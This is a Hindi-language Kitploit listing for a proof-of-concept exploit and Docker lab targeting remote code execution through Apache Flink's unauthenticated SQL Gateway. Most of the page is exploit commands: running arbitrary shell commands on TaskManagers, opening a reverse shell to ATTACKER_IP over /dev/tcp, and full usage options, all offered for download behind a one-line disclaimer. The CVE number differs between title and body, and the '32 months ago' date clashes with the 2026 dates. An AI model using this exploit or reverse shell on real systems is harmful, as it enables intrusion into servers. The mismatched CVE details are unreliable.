Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-25194 — CVE-2026-25194 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट और लैब वातावरण | Kitploit
उपकरण/GitHubGitHub/dexsemon/cve-2026-25194
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubdexsemon/cve-2026-25194

CVE-2026-25194

CVE-2026-25194 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट और लैब वातावरण

रिपॉजिटरी देखें
32 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-35194 — Apache Flink SQL कोड इंजेक्शन

SQL कोड जनरेशन इंजेक्शन के माध्यम से Apache Flink TaskManagers पर रिमोट कोड निष्पादन।

CVECVE-2026-35194
CVSS8.1 (उच्च)
CWECWE-94 — कोड इंजेक्शन
प्रभावितFlink 1.15.0 – 1.20.3 / 2.0.0 – 2.2.0
समाधान1.20.4 / 2.0.2 / 2.1.2 / 2.2.1
हमला सतहSQL Gateway REST API (डिफ़ॉल्ट पोर्ट 8083, बिना प्रमाणीकरण)

त्वरित प्रारंभ

1. असुरक्षित प्रयोगशाला तैनात करें

root@kitploit:~
docker compose up -d

क्लस्टर शुरू होने के लिए लगभग 30 सेकंड प्रतीक्षा करें। दो सेवाएँ शुरू होती हैं:

  • Flink Web UI — http://localhost:8081
  • SQL Gateway REST API — http://localhost:8083

जाँच करें:

root@kitploit:~
curl -s http://localhost:8083/v1/info
# Should return version "1.20.3"

2. निर्भरताएँ स्थापित करें

root@kitploit:~
pip install requests

3. शोषण

JSON वेक्टर:

root@kitploit:~
python3 exploit.py localhost -p 8083 -v json -c "id > /tmp/pwned"

LIKE वेक्टर:

root@kitploit:~
python3 exploit.py localhost -p 8083 -v like -c "id > /tmp/pwned"

केवल संस्करण जाँच (RCE नहीं):

root@kitploit:~
python3 exploit.py localhost -p 8083 --check-only

TaskManager पर RCE सत्यापित करें:

root@kitploit:~
docker exec flink-taskmanager cat /tmp/pwned

4. रिवर्स शेल

root@kitploit:~
# टर्मिनल 1 — सुनने वाला
nc -lvnp 4444

# टर्मिनल 2 — शोषण
python3 exploit.py TARGET -p 8083 -v json \
  -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

उपयोग

root@kitploit:~
usage: exploit.py [-h] [-p PORT] [-c COMMAND] [-v {json,like}]
                  [--check-only] [-t TIMEOUT] [--cert CERT] [--key KEY] [--ssl]
                  target

विकल्प:
  target              लक्ष्य होस्ट (IP या होस्टनाम)
  -p, --port          SQL Gateway पोर्ट (डिफ़ॉल्ट: 8083)
  -c, --command       TaskManager पर चलाने के लिए शेल कमांड
  -v, --vector        json (डिफ़ॉल्ट) या like
  --check-only        केवल संस्करण जाँच, कोई शोषण नहीं
  -t, --timeout       सेकंड में अनुरोध टाइमआउट (डिफ़ॉल्ट: 30)
  --cert / --key      mTLS वातावरण के लिए क्लाइंट प्रमाणपत्र + कुंजी
  --ssl               HTTPS बाध्य करें

अस्वीकरण

केवल अधिकृत सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए।

टूल डाउनलोड करें